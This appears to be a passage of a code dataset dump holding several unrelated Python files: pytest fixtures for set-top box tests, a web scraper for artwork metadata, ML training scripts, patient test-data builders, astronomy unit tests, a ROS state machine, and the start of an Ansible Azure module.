once\n \"\"\"\n parser.addoption('--duration', action='store', default=300,\n help='The requested test duration')\n\n parser.addoption('--sleep_time', action='store', default=10,\n help='The requested sleep time')\n\n parser.addoption('--to-book', action='store', default=2,\n help='Number of future events to book')\n\n parser.addoption('--to-record', action='store', default=1,\n help='Number of current events to record')\n\n parser.addoption('--channels', action='store', default=3,\n help='Range of channels to scroll through')\n\n parser.addoption('--number', action='store', default=2,\n help='The nember of bookings/recordings/pb according to context')\n\n\n@pytest.fixture\ndef stability_params(request):\n params = {}\n params['duration'] = int(request.config.getoption(\"--duration\"))\n params['sleep_time'] = int(request.config.getoption(\"--sleep_time\"))\n params['number'] = int(request.config.getoption(\"--number\"))\n return params\n\n\n@pytest.fixture\ndef booking_params(request):\n return {\n 'to_book': int(request.config.getoption('--to-book')),\n 'to_record': int(request.config.getoption('--to-record')),\n 'channels': int(request.config.getoption('--channels')),\n }\n\n\n@pytest.fixture(scope='session')\ndef register2events(selenium, request):\n '''\n # /* Start transition to page - this is trigger by the use action\n # * milPageTransitionStart - Regular transition - the target page is known - Both page load and ctap are triggering\n # * milLateTransitionStart - Late transition - the target page will be taken from ctap result - only CTAP is triggering\n # * */\n # signal milPageTransitionStart( string page, string metadataUrl, var timestamp )\n # signal milLateTransitionStart( string metadataUrl, var timestamp )\n\n # /* CTAP */\n # signal milCtapStart( string method, string url, var timestamp )\n # signal milCtapFinish( string method, string url, string status, var timestamp )\n # /* This called after the model parsing and all model events occur - this useful to measure the model parsing and binding */\n # signal milCtapCallbackFinish( string method, string url, var timestamp )\n\n # /* Late navigation - target discovered from ctap response - page load is triggering */\n # signal milLateTransitionPageStart( string page, string metadataUrl, var timestamp )\n\n # /* The actual page is loaded - this indicate that the page was loading - but without the model*/\n # signal milPageLoaded( string page, var timestamp )\n # /* The page model was loaded */\n # signal milModelLoaded( string page, string metadataUrl, var timestamp )\n\n # /* The page Intro animation - start/finish -\n # * after the finish event the new page will get the focus */\n # signal milPageIntroStart( string page, string metadataUrl, var timestamp )\n # signal milPageIntroFinish( string page, string metadataUrl, var timestamp )\n\n # /* The previous pages outro animation start and finish\n # * after the finish event the old page will unloaded */\n # signal milPageOutroStart( string page, string metadataUrl, var timestamp )\n # signal milPageOutroFinish( string page, string metadataUrl, var timestamp )\n '''\n logger.info(\"Running fixture register2events\")\n selenium.register_keyevents()\n\n amp_events = [\"playing\", \"paused\", \"stopped\", \"EVENT_PRESENTATION_STATUS_FIRST_FRAME\", \"EVENT_PARENTAL_RATING_UNMUTE\", \"EVENT_PARENTAL_RATING_MUTE\"]\n milestones_events = [\"milPageTransitionStart\", \"milLateTransitionStart\", \"milCtapStart\", \"milCtapFinish\", \"milCtapCallbackFinish\", \"milLateTransitionPageStart\", \"milPageLoaded\", \"milModelLoaded\", \"milPageIntroStart\", \"milPageIntroFinish\", \"milPageOutroStart\", \"milPageOutroFinish\"]\n for amp_event in amp_events:\n selenium.register_videotag_event(amp_event)\n\n for mil_event in milestones_events:\n selenium.register_milestone_event(mil_event)\n\n # To ensure we don't play any VOD/DVR prior to tests starting\n def fin():\n selenium.unregister_keyevents()\n for amp_event in amp_events:\n selenium.unregister_videotag_event(amp_event)\n\n for mil_event in milestones_events:\n selenium.unregister_milestone_event(mil_event)\n request.addfinalizer(fin)\n\n\n@pytest.fixture(scope='function')\ndef set_syslog_debug(request, stb):\n logger.info(\"Running fixture 'set_syslog_debug'\")\n\n stb.set_syslog_hdd_level(7)\n\n\n@pytest.fixture(scope='function')\ndef set_syslog_info(request, stb):\n logger.info(\"Running fixture 'set_syslog_info'\")\n\n stb.set_syslog_hdd_level(6)\n\n\n@pytest.fixture(scope='function')\ndef back_to_live(selenium, request):\n @retry(stop_max_attempt_number=3, wait_fixed=1000)\n def finalyzer_test():\n logger.info(\"Enter on fixture: Back To Live\")\n current_src = selenium.get_video_src()\n logger.info(\"Back To Live INFO: Current URL = {}\".format(str(current_src)))\n if \".m3u8\" in current_src or \"dvr?\" in current_src:\n selenium.send_stop()\n current_src = selenium.get_video_src()\n assert \"rf\" in current_src\n logger.info(\"Back To Live Success = {}, url = {}\".format(str(\"rf\" in current_src), str(current_src)))\n logger.info(\"Exit from Back To Live. Current screen = {}\".format(str(selenium.get_current_screenname())))\n request.addfinalizer(finalyzer_test)\n","sub_path":"Learning/PCT/test_code/engineering_tests/infinitehome/pytest/vgw_tests/stb_tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":5870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"465827132","text":"import requests\r\nfrom bs4 import BeautifulSoup as bs\r\n\r\nurl2 = \"https://artsandculture.google.com/asset/anne-in-a-striped-dress-fairfield-porter/TAHUTWNOPxdkYA\"\r\nreq2 = requests.get(url2)\r\nsoup2 = bs(req2.text, \"lxml\")\r\nim = \"https:\" + soup2.find_all(\"img\", class_=\"pmK5Xc\")[0][\"src\"] # img_link\r\ntd1 = soup2.find(\"section\", class_=\"rw8Th QwmCXd\")\r\ntd3 = td1.find_all(\"li\")\r\n# print(td3)\r\nd3 = {}\r\nfor i in range(len(td3)):\r\n if \"Title\" in td3[i].find_all(\"span\")[0].text:\r\n ind = td3[i].text.index(\": \")\r\n k = td3[i].text[ind + 1 :][1:]\r\n d3[\"Title\"] = k\r\n if \"Creator\" in td3[i].find_all(\"span\")[0].text:\r\n ind = td3[i].text.index(\": \")\r\n k = td3[i].text[ind + 1 :][1:]\r\n d3[\"Creator\"] = k\r\n if \"Location\" in td3[i].find_all(\"span\")[0].text:\r\n ind = td3[i].text.index(\": \")\r\n k = td3[i].text[ind + 1 :][1:]\r\n d3[\"Location\"] = k\r\n if \"Medium\" in td3[i].find_all(\"span\")[0].text:\r\n ind = td3[i].text.index(\": \")\r\n k = td3[i].text[ind + 1 :][1:]\r\n d3[\"Medium\"] = k\r\n if \"External Link\" in td3[i].find_all(\"span\")[0].text:\r\n a = td3[i].find_all(\"a\")\r\n d3[\"External Link\"] = a[0][\"href\"]\r\n\r\nprint(d3)\r\n# d3['Date created']=td3[2].contents[1]\r\n# d3['Location']=td3[3].contents[1]\r\n# d3['Medium']=td3[7].find_all('a')[0].text\r\nf7 = open(\"/Users/Lasitha/Documents/art_tweets/scraped_data/current_tweet.txt\", \"w+\")\r\nfor i in d3:\r\n f7.write(i + \":\" + d3[i] + \"\\n\")\r\nf7.close()\r\nresponse = requests.get(im)\r\nif response.status_code == 200:\r\n with open(\r\n \"/Users/Lasitha/Documents/art_tweets/scraped_data/imgs/current.jpg\", \"wb\"\r\n ) as f:\r\n f.write(response.content)\r\nprint(d3)\r\n","sub_path":"item_details.py","file_name":"item_details.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"377816382","text":"import os\nimport gensim\nimport numpy as np\nimport time\nimport string\n\nimport tensorflow\nprint('tensorflow.version=', tensorflow.__version__)\nif tensorflow.__version__.startswith('1.'):\n import tensorflow as tf\nelse:\n import tensorflow.compat.v1 as tf\n tf.disable_v2_behavior()\n\nfrom gensim.models.word2vec import LineSentence\nfrom cmlapp import CMLA\n\nall_words = {}\nwtf_words = {} \n\n\nclass Config(object):\n data_path = '../../data'\n embedding_path = '../../embedding'\n\n embedding_dim = 200\n attention_slice = 15\n gru_hidden_size = 30\n batch_size = 1\n num_layer = 2\n learning_rate = 0.0007\n drop_rate = 0.5\n max_grad_norm = 5\n\n max_iter = 5\n statistic_step = int(max_iter * 0.1) if int(max_iter * 0.1) > 0 else 2\n test_batch_size = 128\n\n ckpt_path = 'ckpts'\n if not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\n \n \ndef load_doc_to_vecs(path, embedding_file):\n model = gensim.models.Word2Vec.load(embedding_file)\n lines = open(path).read().split('\\n')\n vecs = []\n\n for line in lines:\n line = line.translate(string.punctuation)\n words = line.split(' ')\n line_vecs = []\n for word in words:\n if word not in all_words:\n all_words[word] = ''\n if word in model:\n line_vecs.append(model[word])\n else:\n line_vecs.append(np.zeros(config.embedding_dim))\n if word not in wtf_words:\n wtf_words[word] = ''\n vecs.append(line_vecs)\n return vecs, lines\n\n\ndef load_label_to_vecs(path):\n lines = open(path).read().split('\\n')\n vecs = []\n for line in lines:\n labels = line.split(' ')\n vecs.append(labels)\n return vecs\n\n\ndef train_d2v_model(infile, embedding_file):\n model = gensim.models.Word2Vec(LineSentence(infile), size=200, window=5, min_count=5)\n model.save(embedding_file)\n\n\nif __name__ == '__main__':\n config = Config()\n \n print('(1) load data and trans to vecs...')\n embedding_file = os.path.join(config.embedding_path, 'yelp.vector.bin')\n if not os.path.exists(embedding_file):\n train_d2v_model(os.path.join(config.data_path, 'train_docs.txt'), embedding_file)\n print('embedding_file not exist and then trained')\n \n x_train, x_docs = load_doc_to_vecs(os.path.join(config.data_path, 'train_docs.txt'), embedding_file)\n y_train_a = load_label_to_vecs(os.path.join(config.data_path, 'train_labels_a.txt'))\n y_train_p = load_label_to_vecs(os.path.join(config.data_path, 'train_labels_p.txt'))\n x_train = np.array(x_train)\n\n x_test, x_docs_test = load_doc_to_vecs(os.path.join(config.data_path, 'test_docs.txt'), embedding_file)\n y_test_a = load_label_to_vecs(os.path.join(config.data_path, 'test_labels_a.txt'))\n y_test_p = load_label_to_vecs(os.path.join(config.data_path, 'test_labels_p.txt'))\n x_test = np.array(x_test)\n\n print('there are ' + str(len(all_words))+' words totally')\n print('there are ' + str(len(wtf_words))+' words not be embeded')\n print('train docs:' + str(len(x_train)), 'train labels of aspect:' + str(len(y_train_a)), 'train labels of opinion:' + str(len(y_train_p)))\n print('test docs:' + str(len(x_test)), 'test labels of aspect:' + str(len(y_test_a)), 'test labels of opinion:' + str(len(y_test_p)))\n \n\n print('(2) build model...')\n model = CMLA(config=config)\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=1000)\n \n\n print('(3) train model...')\n with tf.Session() as sess:\n # merged = tf.summary.merge_all()\n #tf.summary.FileWriter('graph', sess.graph)\n sess.run(tf.global_variables_initializer())\n \n start = time.time()\n new_state = sess.run(model.gru_init_state)\n total_loss = 0\n less_loss = 10000.0\n for epoch in range(config.max_iter):\n for i in range(len(x_train)):\n feed_dict = {model.x: x_train[i], model.y1: y_train_a[i], model.y2: y_train_p[i]}\n for ii, dd in zip(model.gru_init_state, new_state):\n feed_dict[ii] = dd\n\n loss, new_state, _ = sess.run([model.loss, model.gru_final_state, model.optimizer], feed_dict=feed_dict)\n total_loss += loss\n end = time.time()\n\n if loss < less_loss:\n model_file = os.path.join(config.ckpt_path, \"cmla_tf_{}-{}-{}.th\".format(epoch, i, loss))\n saver.save(sess, model_file, global_step=epoch)\n print('epoch:' + str(epoch), 'steps:' + str(i), 'model_file=', model_file)\n less_loss = loss\n\n if i % config.statistic_step == 0:\n ave_loss = total_loss\n if i > 0:\n ave_loss = total_loss / config.statistic_step\n print('epoch:' + str(epoch) + ' / ' + str(config.max_iter), 'steps: ' + str(i),\n 'cost_time:' + str(end - start), 'loss:' + str(ave_loss))\n\n total_loss = 0\n correct_a_num = 0\n correct_p_num = 0\n for index in range(config.test_batch_size):\n feed_dict[model.x] = x_train[index]\n feed_dict[model.y1] = y_train_a[index]\n feed_dict[model.y2] = y_train_p[index]\n correct_a, correct_p = sess.run([model.correct_a, model.correct_p], feed_dict=feed_dict)\n if correct_a:\n correct_a_num += 1\n if correct_p:\n correct_p_num += 1\n score1 = float(correct_a_num) * 100 / config.test_batch_size\n score2 = float(correct_p_num) * 100 / config.test_batch_size\n print('Train epoch:' + str(epoch), 'steps:' + str(i), 'precision: ' + str(score1) + ' ' + str(score2))\n\n correct_a_num = 0\n correct_p_num = 0\n test_batch_size = len(x_test)\n for index in range(test_batch_size):\n feed_dict[model.x] = x_test[index]\n feed_dict[model.y1] = y_test_a[index]\n feed_dict[model.y2] = y_test_p[index]\n correct_a, correct_p = sess.run([model.correct_a, model.correct_p], feed_dict=feed_dict)\n if correct_a:\n correct_a_num += 1\n if correct_p:\n correct_p_num += 1\n score1 = float(correct_a_num) * 100 / config.test_batch_size\n score2 = float(correct_p_num) * 100 / config.test_batch_size\n print('Test epoch:' + str(epoch), 'steps:' + str(i), 'precision: ' + str(score1) + ' ' + str(score2))\n","sub_path":"opinion_extraction/CMLA/tf/train_cmla.py","file_name":"train_cmla.py","file_ext":"py","file_size_in_byte":6918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"128340321","text":"import random\nimport sys\nfrom sklearn.preprocessing import StandardScaler\n\nfrom NN.window import build_array_skytem\n\nsys.path.insert(0, '../utilities')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom utilities.data_reader import load_data2, remove_edge\nfrom utilities.calc_metrics import metrics\nimport utilities.data_visualize as dv\nimport utilities.difference\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\ndef rnd_forest2(timestamp_val, dbdt, lbl, X_valOG, X_train, X_val,\n y_train, y_val, n_trees = 100):\n\n print(\"Training size: \", X_train.shape[0])\n print(\"Val size: \", X_val.shape[0])\n #Create Model\n classifier = RandomForestClassifier(n_estimators=n_trees, max_features=None)\n\n #Train\n classifier.fit(X_train, y_train)\n\n #Predict\n y_scor = classifier.predict_proba(X_val)\n\n #find misclassified samples\n y_pred = y_scor[:, 1] >= 0.8\n misclassified = np.where(y_val != y_pred)\n corclassified = np.where(y_val == y_pred)\n\n #plot data and red bars where data is misclassified\n # plt.figure(\"Soundings\")\n # timestamp = timestampToTime(timestamp)\n\n dv.plot_misclassified(timestamp_val, X_valOG, y_val, y_pred)\n # utilities.data_visualize.plotDat(timestamp, dbdt, lbl)\n # plt.yscale('log')\n # timestamp = timestamp - timestamp[0]\n # for xc in misclassified[0]:\n # ogmark = timestamp[test_idx[xc]]\n # plt.axvline(x=ogmark, color = 'red')\n\n # #plot correctly classified\n # for xc in corclassified[0]:\n # ogmark = timestamp[X_test_idx[xc]]\n # plt.axvline(x=ogmark, color = 'blue')\n\n\n #metrics\n report, CM, ACC, AUC = metrics(y_val, y_scor[:,1], y_pred)\n return y_scor[:,1], classifier.feature_importances_, report, ACC, AUC, CM\n\ndef main():\n ## Data preprocessing\n fname0 = \"../data/stendalmark_20181120_RAW_export.xyz\"\n fname1 = \"../data/stendalmark_20181121_RAW_export.xyz\"\n\n df, dbdt, lbl, timestamp, gtimes = load_data2(fname0, 8, 24)\n dbdt, lbl, timestamp = remove_edge(timestamp, dbdt, lbl, 20)\n timestamp = (timestamp - timestamp[0]) * 10 ** 5\n\n df0, dbdt0, lbl0, timestamp0, gtimes0 = load_data2(fname1, 8, 24)\n dbdt0, lbl0, timestamp0 = remove_edge(timestamp0, dbdt0, lbl0, 20)\n timestamp0 = (timestamp0 - timestamp0[0]) * 10 ** 5 + timestamp[-1] + 0.7\n\n dbdt = np.concatenate((dbdt, dbdt0));\n lbl = np.concatenate((lbl, lbl0))\n timestamp = np.concatenate((timestamp, timestamp0))\n sc = StandardScaler()\n\n r = int(np.ceil(0.8 * dbdt.shape[0]))\n dbdt = dbdt[0:r, :]\n lbl = lbl[0:r]\n timestamp=timestamp[0:r]\n idx = range(0, dbdt.shape[0])\n v = int(np.ceil(0.8 * dbdt.shape[0]))\n X_test = dbdt[v:, :]\n X_train = dbdt[0:v, :]\n y_train = lbl[0:v]\n y_test = lbl[v:]\n idx_train = list(idx[0:v])\n X_train = sc.fit_transform(X_train)\n X_test = sc.transform(X_test)\n\n # X_train = build_array_skytem(41, X_train)\n # X_test = build_array_skytem(41, X_test)\n # y_score, _, report, acc = rnd_forest2(timestamp, dbdt, lbl, idx[r:],\n # X_train.T, X_test.T,\n # y_train[20:-20], y_test[20:-20], n_trees=100)\n\n # trees = range(1,100)\n trees = np.linspace(0.01,1.0, 50)\n metric = np.zeros((len(trees),))\n for i, n_trees in enumerate(trees):\n # random.shuffle(idx_train)\n n = int(np.ceil(n_trees * X_train.shape[0]))\n _, _, report, acc, auc, CM = rnd_forest2(timestamp[v:], dbdt, lbl, X_test,\n X_train[idx_train[0:n],:], X_test,\n y_train[idx_train[0:n]], y_test, n_trees=100)\n metric[i] = CM[1,0] + CM[0,1]\n plt.figure()\n plt.close('all')\n print(\"Iteration: \", i)\n plt.plot(trees, metric)\n plt.ylabel(\"Total errors\")\n plt.xlabel(\"Training set in use [Fraction]\")\n plt.show()\n\n\nif __name__ == '__main__':\n main()","sub_path":"SVM/rndForest2.py","file_name":"rndForest2.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69239739","text":"from datetime import datetime\n\n\ndef create_treatment_arm(trtmt_id, version, pats_assigned=5, max_pats_allowed=35, gene='NF1', status='OPEN',\n assay_results=None):\n \"\"\"\n Returns a dict containing a simplified representation of a treatment arm for the currentTreatmentArm\n of the Patient model.\n \"\"\"\n return {\n '_id': trtmt_id,\n 'version': version,\n 'numPatientsAssigned': pats_assigned,\n 'maxPatientsAllowed': max_pats_allowed,\n 'gene': gene,\n 'treatmentArmStatus': status,\n 'assayResults': assay_results if assay_results is not None else [],\n }\n\n\ndef create_patient(pat_seq_num, status, gender=\"Male\", curr_step_num = 0, trtmt_arm=None, diseases=None, other=None):\n \"\"\"\n Returns a dict containing a simplified representation of a patient in the Patient model.\n \"\"\"\n if diseases is None:\n diseases = []\n pat = {\n # '_id': int(pat_seq_num),\n 'patientSequenceNumber': pat_seq_num,\n 'gender': gender,\n 'currentPatientStatus': status,\n 'currentStepNumber': curr_step_num,\n 'diseases': diseases,\n }\n if trtmt_arm is not None:\n pat['currentTreatmentArm'] = trtmt_arm\n if other:\n for field_name, data in other.items():\n pat[field_name] = data\n return pat\n\n\ndef create_patient_variant(identifier, gene=None, chromosome=None, protein=None, allele_freq=None, ovc=None,\n copy_num=None, funct=None, transcript=None, hgvs=None, position=None, exon=None,\n rare=None, location=None, annotation=None):\n \"\"\"\n Creates and returns a single variant as it might appear in the Patient collection.\n \"\"\"\n patient_variant = {\n 'identifier': identifier,\n }\n # The following are fields that are relevant to Mois, but may or may not be present:\n if gene is not None:\n patient_variant['gene'] = gene\n if chromosome is not None:\n patient_variant['chromosome'] = chromosome\n if copy_num is not None:\n patient_variant['copyNumber'] = copy_num\n if protein is not None:\n patient_variant['protein'] = protein\n if funct is not None:\n patient_variant['function'] = funct\n if hgvs is not None:\n patient_variant['hgvs'] = hgvs\n if allele_freq is not None:\n patient_variant['alleleFrequency'] = allele_freq\n if ovc is not None:\n patient_variant['oncomineVariantClass'] = ovc\n if transcript is not None:\n patient_variant['transcript'] = transcript\n if position is not None:\n patient_variant['position'] = position\n if exon is not None:\n patient_variant['exon'] = exon\n if rare is not None:\n patient_variant['rare'] = rare\n if location is not None:\n patient_variant['location'] = location\n if annotation is not None:\n patient_variant['annotation'] = annotation\n\n return patient_variant\n\n\ndef create_variant_report(created_date=datetime.now()):\n \"\"\"\n Creates and returns an empty patient variant report with the six required variant lists to be used in testing.\n \"\"\"\n pat_var_rpt = {\n 'singleNucleotideVariants': [],\n 'copyNumberVariants': [],\n 'indels': [],\n 'geneFusions': [],\n 'unifiedGeneFusions': [],\n 'nonHotspotRules': [],\n 'createdDate': created_date,\n }\n return pat_var_rpt\n\n\ndef create_assay_msg(biomarker, result=None, reported_date=None, ordered_date=None):\n \"\"\"\n Creates and returns a minimalistic assay message for patient model.\n \"\"\"\n assay_msg = {'biomarker': biomarker}\n if result:\n assay_msg['result'] = result\n if reported_date:\n assay_msg['reportedDate'] = reported_date\n if ordered_date:\n assay_msg['orderedDate'] = ordered_date\n return assay_msg\n\n\n# Constants for treatment arm assay results\nTA_PTEN_ASSAY = {\n \"gene\" : \"PTEN\",\n \"assayResultStatus\" : \"POSITIVE\",\n \"assayVariant\" : \"PRESENT\",\n \"levelOfEvidence\" : 3.0\n}\nTA_MSH2_ASSAY = {\n \"gene\" : \"MSH2\",\n \"assayResultStatus\" : \"POSITIVE\",\n \"assayVariant\" : \"NEGATIVE\",\n \"levelOfEvidence\" : 4.0\n}\nTA_MLH1_ASSAY = {\n \"gene\" : \"MLH1\",\n \"assayResultStatus\" : \"NEGATIVE\",\n \"assayVariant\" : \"EMPTY\",\n \"levelOfEvidence\" : 5.0\n}\nTA_RB_ASSAY = {\n \"gene\" : \"RB\",\n \"assayResultStatus\" : \"NEGATIVE\",\n \"assayVariant\" : \"PRESENT\",\n \"levelOfEvidence\" : 6.0\n}\nTA_RB_ASSAY2 = {\n \"gene\" : \"rb\",\n \"assayResultStatus\" : \"NEGATIVE\",\n \"assayVariant\" : \"PRESENT\",\n \"levelOfEvidence\" : 7.0\n}\n","sub_path":"tests/patient_data.py","file_name":"patient_data.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"550888748","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nimport pytest\nfrom numpy.testing import assert_allclose\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord\nfrom regions import CircleSkyRegion\nfrom gammapy.data import DataStore, Observations, ObservationStats\nfrom gammapy.spectrum import ReflectedRegionsBackgroundEstimator\nfrom gammapy.utils.testing import requires_data\n\n\n@pytest.fixture(scope=\"session\")\ndef observations():\n data_store = DataStore.from_dir(\"$GAMMAPY_DATA/hess-dl3-dr1/\")\n run_list = [23523, 23526]\n return Observations([data_store.obs(_) for _ in run_list])\n\n\n@pytest.fixture(scope=\"session\")\ndef on_region():\n pos = SkyCoord(83.63 * u.deg, 22.01 * u.deg)\n on_size = 0.3 * u.deg\n return CircleSkyRegion(pos, on_size)\n\n\n@pytest.fixture(scope=\"session\")\ndef bad_on_region():\n pos = SkyCoord(83.6333 * u.deg, 21.5144 * u.deg)\n on_size = 0.3 * u.deg\n return CircleSkyRegion(pos, on_size)\n\n\n@pytest.fixture(scope=\"session\")\ndef stats(on_region, observations):\n obs = observations[0]\n bge = ReflectedRegionsBackgroundEstimator(on_region=on_region, observations=obs)\n bg = bge.process(obs)\n return ObservationStats.from_observation(obs, bg)\n\n\n@pytest.fixture(scope=\"session\")\ndef stats_bad_on_region(bad_on_region, observations):\n obs = observations[0]\n bge = ReflectedRegionsBackgroundEstimator(on_region=bad_on_region, observations=obs)\n bg = bge.process(obs)\n return ObservationStats.from_observation(obs, bg)\n\n\n@pytest.fixture(scope=\"session\")\ndef stats_stacked(on_region, observations):\n bge = ReflectedRegionsBackgroundEstimator(\n on_region=on_region, observations=observations\n )\n bge.run()\n\n return ObservationStats.stack(\n [\n ObservationStats.from_observation(obs, bg)\n for obs, bg in zip(observations, bge.result)\n ]\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef stats_stacked_bad_on_region(bad_on_region, observations):\n bge = ReflectedRegionsBackgroundEstimator(\n on_region=bad_on_region, observations=observations\n )\n bge.run()\n\n return ObservationStats.stack(\n [\n ObservationStats.from_observation(obs, bg)\n for obs, bg in zip(observations, bge.result)\n ]\n )\n\n\n@requires_data()\nclass TestObservationStats:\n @staticmethod\n def test_str(stats):\n text = str(stats)\n assert \"Observation summary report\" in text\n\n @staticmethod\n def test_to_dict(stats):\n data = stats.to_dict()\n assert data[\"n_on\"] == 425\n assert data[\"n_off\"] == 406\n assert_allclose(data[\"alpha\"], 0.333, rtol=1e-2)\n assert_allclose(data[\"sigma\"], 16.136, rtol=1e-3)\n assert_allclose(data[\"gamma_rate\"].value, 10.988, rtol=1e-3)\n assert_allclose(data[\"bg_rate\"].value, 5.1335, rtol=1e-3)\n assert_allclose(data[\"livetime\"].value, 26.362, rtol=1e-3)\n\n @staticmethod\n def test_bad_on(stats_bad_on_region):\n data = stats_bad_on_region.to_dict()\n assert data[\"alpha\"] == 0\n\n @staticmethod\n def test_stack(stats_stacked):\n data = stats_stacked.to_dict()\n assert data[\"n_on\"] == 900\n assert data[\"n_off\"] == 798\n assert_allclose(data[\"alpha\"], 0.333, rtol=1e-2)\n assert_allclose(data[\"sigma\"], 24.6307, rtol=1e-3)\n\n @staticmethod\n def test_stack_bad_on(stats_stacked_bad_on_region):\n data = stats_stacked_bad_on_region.to_dict()\n assert data[\"n_on\"] == 156\n assert data[\"n_off\"] == 1114\n assert_allclose(data[\"alpha\"], 0.1111, rtol=1e-3)\n assert_allclose(data[\"livetime\"].value, 26.211, rtol=1e-3)\n","sub_path":"gammapy/data/tests/test_obs_stats.py","file_name":"test_obs_stats.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"442163982","text":"#!/usr/bin/env python\nimport roslib; \nroslib.load_manifest('fmDecisionMakers')\nimport rospy\nimport smach\nimport smach_ros\nimport actionlib\nimport math\nimport tf\nfrom fmExecutors.msg import timed_turnAction,timed_turnGoal \nfrom fmMsgs.msg import adc\n \n\ndef force_preempt(a):\n return True\n\ndef line_found(ud,msg):\n if msg.value[0] > ud.threshold:\n return False\n elif msg.value[1] > ud.threshold:\n return False\n else: \n return True\n \n\ndef build_wiggle_sm(threshold, width):\n wiggle_sm = smach.StateMachine(outcomes = ['succeeded','aborted','preempted'])\n with wiggle_sm:\n smach.StateMachine.add('WIGGLE_LEFT',\n smach_ros.SimpleActionState('/fmExecutors/timed_turn',timed_turnAction,goal=timed_turnGoal(time=2.0, vel=0.1)),\n transitions = {'succeeded':'WIGGLE_RIGHT','aborted':'aborted','preempted':'preempted'}\n )\n smach.StateMachine.add('WIGGLE_RIGHT',\n smach_ros.SimpleActionState('/fmExecutors/timed_turn',timed_turnAction,goal=timed_turnGoal(time=2.0, vel=-0.1)),\n transitions = {'succeeded':'WIGGLE_LEFT','aborted':'aborted','preempted':'preempted'}\n )\n return wiggle_sm\n \ndef build_find_line_behaviour(threshold,vel):\n find_line_sm = smach.Concurrence(outcomes=['succeeded','preempted','aborted'],\n default_outcome = 'aborted',\n outcome_map = {\n 'succeeded':{'WIGGLE':'preempted','FIND_LINE':'invalid'},\n 'preempted':{'WIGGLE':'preempted','FIND_LINE':'preempted'}\n },\n child_termination_cb=force_preempt)\n find_line_sm.userdata.threshold = threshold\n with find_line_sm:\n smach.Concurrence.add('WIGGLE',build_wiggle_sm(threshold,vel))\n smach.Concurrence.add('FIND_LINE',smach_ros.MonitorState(\"/fmSensors/adc\",adc,line_found,-1),\n remapping = {'threshold':'threshold'})\n \n return find_line_sm\n\n","sub_path":"fmDecisionMakers/src/behaviours/line_behaviours/find_line_behaviour.py","file_name":"find_line_behaviour.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"14542768","text":"import re\n\nclass CacheControl(object):\n def __init__(self, rules=None):\n self.rules = rules or []\n\n def cache_control(self, event):\n response = event.get('response')\n request = event.get('request')\n context = event.get('context')\n\n if request.method in [\"GET\", \"HEAD\"]:\n rule = self.find_rule(context.node)\n else:\n rule = self.get_default()\n\n response.headers['Cache-Control'] = \", \".join(rule['Cache-Control'])\n\n def find_rule(self, node):\n for rule in self.rules:\n if rule['path'].match(node.id):\n return rule\n\n return self.get_default()\n\n def get_default(self):\n return {\n 'Cache-Control': ['private', 'must-revalidate']\n }","sub_path":"element/plugins/cache/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"389327958","text":"from src.crawl_web import crawl_web\nfrom src.todos_paquetes_link import todos_paquetes_link\nfrom urllib.request import urlopen\nlink = \"https://bertavr.github.io/Proyecto_Rick_y_Morty/index.html\"\n\ndef web_scrapping (link):\n lista = []\n links = crawl_web(link)\n for enlace in links:\n packs_de_un_link = []\n html = convertir_string(link)\n buscador = html.find('nombre')\n if buscador != -1:\n packs_de_un_link = todos_paquetes_link(html)\n lista.append(packs_de_un_link)\n return lista\nprint(web_scrapping(link))\n\n","sub_path":"pytest/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"147486593","text":"#!/usr/bin/python\n#\n# Copyright (c) 2018 Zim Kalinowski, \n#\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: azure_rm_storsimpledevice_facts\nversion_added: \"2.8\"\nshort_description: Get Azure Device facts.\ndescription:\n - Get facts of Azure Device.\n\noptions:\n device_name:\n description:\n - The device name.\n resource_group:\n description:\n - The resource group name\n required: True\n name:\n description:\n - The manager name\n required: True\n expand:\n description:\n - Specify $expand=details to populate additional fields related to the device.\n\nextends_documentation_fragment:\n - azure\n\nauthor:\n - \"Zim Kalinowski (@zikalino)\"\n\n'''\n\nEXAMPLES = '''\n - name: Get instance of Device\n azure_rm_storsimpledevice_facts:\n device_name: device_name\n resource_group: resource_group_name\n name: manager_name\n expand: expand\n\n - name: List instances of Device\n azure_rm_storsimpledevice_facts:\n resource_group: resource_group_name\n name: manager_name\n expand: expand\n'''\n\nRETURN = '''\ndevices:\n description: A list of dictionaries containing facts for Device.\n returned: always\n type: complex\n contains:\n id:\n description:\n - The identifier.\n returned: always\n type: str\n sample: 